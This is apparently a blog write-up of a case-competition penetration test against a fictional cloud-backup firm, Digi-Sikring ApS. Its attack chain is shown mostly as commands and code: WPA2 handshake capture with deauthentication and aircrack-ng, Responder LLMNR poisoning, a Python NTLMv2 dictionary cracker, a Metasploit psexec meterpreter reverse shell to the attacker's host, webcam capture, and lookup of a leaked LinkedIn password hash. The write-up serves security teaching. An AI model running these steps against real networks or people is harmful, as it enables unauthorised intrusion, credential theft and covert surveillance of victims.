One Eyed Techs
This scenario was written for a case competition as part of a cyber security presentation. The presentation treated the scenario as a penetration test of an online company offering backups in the cloud. The name of the company is Digi-Sikring ApS.
No laws were broken in creating and documenting this scenario. All tests were performed on my private property.
The following segment of the scenario is executed from the position of an external threat agent.
Part 1: Got wifi?
First step is to enable monitor mode on the network interface card.
root@parrot:~$ sudo airmon-ng start wlan0
Next, I scan for wireless networks with the network card in monitor mode.
This is done with the following command:
root@parrot:~$ sudo airodump-ng wlan0mon
While scanning, a network called digisikringaps-2.4Ghz appears.
The next step is to narrow the capture down to the network of interest. With the following command, only the network digisikringaps-2.4Ghz (channel 1, BSSID E0:B9:E5:A5:4D:27) is monitored, and the captured frames are written to files on the Desktop.
root@parrot:~$ sudo airodump-ng -c 1 --bssid E0:B9:E5:A5:4D:27 -w /home/root/Desktop/digisikringaps-wifi wlan0mon
The files with the captured data are stored on the Desktop, the most important being the .cap file. It becomes far more interesting once it contains a four-way handshake, the key exchange a client performs when it joins a network with WPA2 encryption.
To capture the four-way handshake, a device has to authenticate with the network while the capture is running. Instead of waiting for that to happen, a deauthentication attack can be launched against the connected devices. This forces them off the network; most will reconnect automatically, which lets me capture the handshake. To launch the deauthentication attack (two bursts, -0 2) against the only connected device, the following command is executed:
root@parrot:~$ sudo aireplay-ng -0 2 -a E0:B9:E5:A5:4D:27 -c 84:29:99:18:CD:33 wlan0mon
The attack was successful, and the terminal monitoring the network now reports the captured four-way handshake.
If the .cap file is opened in Wireshark, the four-way handshake can be seen as four EAPOL-Key frames. EAPOL (Extensible Authentication Protocol over LAN, from IEEE 802.1X) is the framing that carries the key exchange.
The passphrase itself is not stored in the .cap file. What the handshake contains is the nonces exchanged by both sides and a MIC computed with a key derived from the passphrase, and that is enough to test candidate passphrases offline. aircrack-ng from the aircrack-ng suite does exactly this, trying every word in a password list against the captured handshake.
The command executed is as follows.
root@parrot:~$ sudo aircrack-ng -a2 -b E0:B9:E5:A5:4D:27 -w /usr/share/wordlists/fern-wifi/common.txt /home/root/Desktop/digisikringaps-wifi/*cap
Since the wireless network password is in the wordlist used, it is cracked within seconds.
Part 2: Houston, we have a shell
After connecting to the network, I'd like to determine the default gateway in order to discover hosts connected to the network.
root@parrot:~$ route -n
The default gateway is 192.168.1.1, so the network is 192.168.1.0/24. To discover connected hosts I'll ping-sweep every address on it with nmap.
root@parrot:~$ sudo nmap -sP -PI -PT 192.168.1.0/24
The connected device with IP 192.168.1.112 looks like a Windows machine. Let's target that. To attack the device, I'll use Responder. When a hostname that does not resolve in DNS is entered into a browser (or a file share path), a Windows machine falls back to asking the other devices on the local network, via LLMNR and NBT-NS, whether any of them recognises the name. Responder answers every such query, claiming that its own IP address is the one behind the unrecognised hostname. The target then connects to Responder and authenticates with NTLM, handing over the username in cleartext and an NTLMv2 challenge-response computed from the hash of the user's password.
root@parrot:~$ sudo responder -I wlan0 -wv
The hashes are stored in /usr/share/responder/logs.
root@parrot:~$ cd /usr/share/responder/logs
I'll use john the ripper to attempt cracking the NTLMv2 hash.
root@parrot:/usr/share/responder/logs$ john SMBv2-NTLMv2-SSP-192.168.1.112.txt
John cracked the NTLMv2 response in under a second. NTLMv2 does not protect a weak password: the response is an HMAC over the server's challenge, keyed by a value derived from the unsalted NT hash of the password, so anyone holding the capture can test candidates offline at full speed. This emphasises the importance of not relying on a weak password.
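As an added example, not from the original write-up and not John the Ripper's own code, here is what John's netntlmv2 format (and hashcat mode 5600) verify for each candidate, applied to a line in Responder's log format. The username johs and password password1 are the ones this write-up uses for the psexec step below; the domain, server challenge and blob in the sample line are constructed. A pure-Python MD4 is included because OpenSSL 3 hides MD4 behind its legacy provider, so hashlib.new("md4") is often unavailable.

```python
"""Offline NTLMv2 check: what john/hashcat do with a Responder log line."""
import hashlib
import hmac
import struct

_M32 = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & _M32


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python (three rounds of 16 steps over 512-bit blocks)."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rounds = (
        (f, range(16), (3, 7, 11, 19), 0),
        (g, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (h, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, order, shifts, k in rounds:
            for i, idx in enumerate(order):
                a = _rotl((a + fn(b, c, d) + x[idx] + k) & _M32, shifts[i % 4])
                a, b, c, d = d, a, b, c      # rotate registers so each step updates the next one
        state = [(s + v) & _M32 for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4 of the UTF-16LE password (MS-NLMP NTOWFv1). No salt, no iterations."""
    return md4(password.encode("utf-16le"))


def ntlmv2_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NtProofStr (MS-NLMP 3.3.2): HMAC-MD5 chain keyed by the NT hash."""
    key = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()
    return hmac.new(key, server_challenge + blob, hashlib.md5).digest()


def crack_responder_line(line: str, wordlist):
    """Responder / hashcat 5600 format: user::domain:challenge:NtProofStr:blob (hex fields).
    Returns the first candidate that reproduces NtProofStr, else None."""
    user, _, domain, challenge, proof, blob = line.strip().split(":", 5)
    challenge_b, proof_b, blob_b = (bytes.fromhex(v) for v in (challenge, proof, blob))
    for candidate in wordlist:
        if hmac.compare_digest(ntlmv2_proof(candidate, user, domain, challenge_b, blob_b), proof_b):
            return candidate
    return None


def sample_line(password: str = "password1", user: str = "johs", domain: str = "DESKTOP-DS01") -> str:
    """Constructed stand-in for a line of SMBv2-NTLMv2-SSP-192.168.1.112.txt. The domain,
    server challenge and blob are made up; only the username and password come from the write-up."""
    challenge = bytes.fromhex("1122334455667788")
    blob = bytes.fromhex("0101000000000000" "00a0bf2bc7c0d401" "8f7d4ac1e2b3d406"
                         "00000000" "00000000" "00000000")
    proof = ntlmv2_proof(password, user, domain, challenge, blob)
    return f"{user}::{domain}:{challenge.hex()}:{proof.hex()}:{blob.hex()}"


if __name__ == "__main__":
    print("cracked:", crack_responder_line(sample_line(), ["Summer2018", "Welcome1", "password1"]))
```

Everything in the line except the password is public to whoever captured it: the server challenge and the blob (timestamp, client challenge, target info) are sent in the clear, and the only secret feeding the two HMACs is the NT hash, which is an unsalted MD4 of the password. That is why the check above is cheap and why a dictionary word falls instantly, while the same capture is useless against a long random password.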
Metasploit's psexec module gives authenticated remote code execution on a target system over SMB, using the cracked credentials. Let's use a reverse shell as the payload to execute.
First some parameters are to be set.
msf > use exploit/windows/smb/psexec
msf exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(windows/smb/psexec) > set smbuser johs
msf exploit(windows/smb/psexec) > set smbpass password1
msf exploit(windows/smb/psexec) > set lhost 192.168.1.162
msf exploit(windows/smb/psexec) > set rhost 192.168.1.112
msf exploit(windows/smb/psexec) > exploit
We're in. Printing the working directory shows that the shell is open in C:\Windows\System32.
Furthermore, we can launch Armitage, a graphical front end for the Metasploit Framework, and grab a picture through the webcam of the compromised computer.
Part 3: Correct horse battery stable
The third part is an example of compromising an employee from the outside. Using Maltego, we can search for the employee's name.
An e-mail address is associated with the employee's name. Digging a little deeper, it appears that this e-mail address has been part of a password leak.
Obtaining the leaked LinkedIn database lets us find the SHA-1 hash of the password that was used.
Unsalted SHA-1 is not considered safe for password storage as of 2018. Searching for the hash in online databases revealed that it had indeed already been cracked.
This concludes the hypothetical pentest done as a case competition.